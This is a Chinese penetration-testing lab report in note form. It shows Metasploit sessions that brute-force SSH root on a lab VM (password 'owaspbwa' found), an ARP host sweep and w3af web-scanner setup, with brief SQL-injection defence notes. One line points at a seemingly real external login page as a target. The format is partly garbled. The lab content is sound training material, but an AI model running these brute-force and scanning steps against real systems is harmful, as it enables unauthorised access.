渗透测试 实验报告(中国移动安全部) 下载本文

内容发布更新时间 : 2024/12/28 11:38:43星期一 下面是文章的全部内容请认真阅读。

line

VERBOSE true yes Whether to print output for all attempts

msf auxiliary(ssh_login) > set USERNAME root USERNAME => root

msf auxiliary(ssh_login) > set PASS_FILE / root/ passwd ://在root根目录下创建一个密码文件,名字叫passwd

PASS_FILE => root passwd

msf auxiliary(ssh_login) > set THREADS 50 THREADS => 50

msf auxiliary(ssh_login) > set RHOSTS 10.10.10.129 RHOSTS => 10.10.10.129 msf auxiliary(ssh_login) > run

[*] 10.10.10.129:22 SSH - Starting bruteforce

[*] 10.10.10.129:22 SSH - [1/3] - Trying: username: 'root' with password: 'ahbieid' [-] 10.10.10.129:22 SSH - [1/3] - Failed: 'root':'ahbieid'

[*] 10.10.10.129:22 SSH - [2/3] - Trying: username: 'root' with password: 'xideoejd' [-] 10.10.10.129:22 SSH - [2/3] - Failed: 'root':'xideoejd'

[*] 10.10.10.129:22 SSH - [3/3] - Trying: username: 'root' with password: 'owaspbwa'

[*] Command shell session 1 opened (10.10.10.128:40157 -> 10.10.10.129:22) at 2015-03-14 13:51:30 +0800

[+] 10.10.10.129:22 SSH - [3/3] - Success: 'root':'owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '

[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 口令猜解成功。

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

主机存活探测实验:

msf > use auxiliary/scanner/discovery/arp_sweep msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

Name Current Setting Required Description ---- --------------- -------- -----------

INTERFACE no The name of the interface

RHOSTS yes The target address range or CIDR identifier SHOST no Source IP Address SMAC no Source MAC Address

THREADS 1 yes The number of concurrent threads

TIMEOUT 5 yes The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24 RHOSTS => 10.10.10.0/24

msf auxiliary(arp_sweep) > set THREADS 50 THREADS => 50

msf auxiliary(arp_sweep) > run

[*] 10.10.10.1 appears to be up (VMware, Inc.). [*] 10.10.10.2 appears to be up (VMware, Inc.). [*] 10.10.10.129 appears to be up (VMware, Inc.). [*] 10.10.10.130 appears to be up (VMware, Inc.). [*] 10.10.10.254 appears to be up (VMware, Inc.). [*] 10.10.10.254 appears to be up (VMware, Inc.). [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

网络扫描 Openvas 等

Web扫描

1、modules/auxiliary下,wmap load wmap(初始化wmap)

wmap_sites -a http://XXX (使用wmap进行扫描 wmap_sites -l

wmap_targets -t http://XXXX

wamp_run -t (运行后,wmap会调用配置好的辅助模块对目标进行扫描,然后查看结果) wamp_run -e vunls ??

www.exploit-db.com

www.netasploit.com/modules packetstormsecurity.org

cd /usr/share/w3af/

关于扫描的一个很实用的工具W3af w3af_console

plugins

audit xss(表示跨站漏洞) sql(表示注入)漏洞 back plugins

output html_file, console output config html_file

set output_file 123.html set verbose True back back plugins

crawl web_spider

crawl config web_spider set only_forward True set follow_regex .* set ignore_regex back back target

set target http://www.dvssc.com/mutillidae/ back

SQL注入关键字: 参数化查询 过滤(白名单)

编码(绕过防注,过滤) Mysql款字节

二次输入(任何输入都是有害的) 容错处理(暴错输入)

最小权限(目前,非常多root,见乌云)

http://218.206.165.70:8972/qhwxcs-djy/login.jsp 找到用户名和密码就可以登录进去

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 扫描实验:

root@kali:~# cd /usr/share/w3af/

root@kali:/usr/share/w3af# w3af_console w3af>>> plugins

w3af/plugins>>> help

|------------------------------------------------------------------------------------|

| list | List available plugins. | |------------------------------------------------------------------------------------|

| back | Go to the previous menu. | | exit | Exit w3af. |

|------------------------------------------------------------------------------------|

| bruteforce | View, configure and enable bruteforce plugins | | infrastructure | View, configure and enable infrastructure plugins |

| evasion | View, configure and enable evasion plugins | | mangle | View, configure and enable mangle plugins | | audit | View, configure and enable audit plugins | | grep | View, configure and enable grep plugins | | output | View, configure and enable output plugins | | auth | View, configure and enable auth plugins | | crawl | View, configure and enable crawl plugins | |------------------------------------------------------------------------------------| w3af/plugins>>> audit

-----------------------------------------------------------------------------------|

| Plugin name | Status | Conf | Description | |-----------------------------------------------------------------------------------|

| blind_sqli | | Yes | Identify blind SQL injection |

| | | | vulnerabilities. |

| buffer_overflow | | | Find buffer overflow vulnerabilities. | | cors_origin | | Yes | Inspect if application checks that the value |

| | | | of the \ | | | | | with the value of the remote IP address/Host | | | | | of the sender ofthe incoming HTTP request. | | csrf | | | Identify Cross-Site Request Forgery |

| | | | vulnerabilities. |

| dav | | | Verify if the WebDAV module is properly |

| | | | configured. |

| eval | | Yes | Find insecure eval() usage. | | file_upload | | Yes | Uploads a file and then searches for the | | | | | file inside all known directories. | | format_string | | | Find format string vulnerabilities. | | frontpage | | | Tries to upload a file using frontpage |

| | | | extensions (author.dll). | | generic | | Yes | Find all kind of bugs without using a fixed |